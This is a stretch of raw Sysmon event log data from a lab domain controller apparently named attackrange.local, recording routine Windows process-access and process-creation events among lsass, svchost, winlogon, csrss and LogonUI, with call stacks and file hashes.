13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.510{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{59A5CD1D-8E46-6005-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0800-00000000A301}720816C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0900-00000000A301}796800C:\Windows\system32\winlogon.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.504{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bb7055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 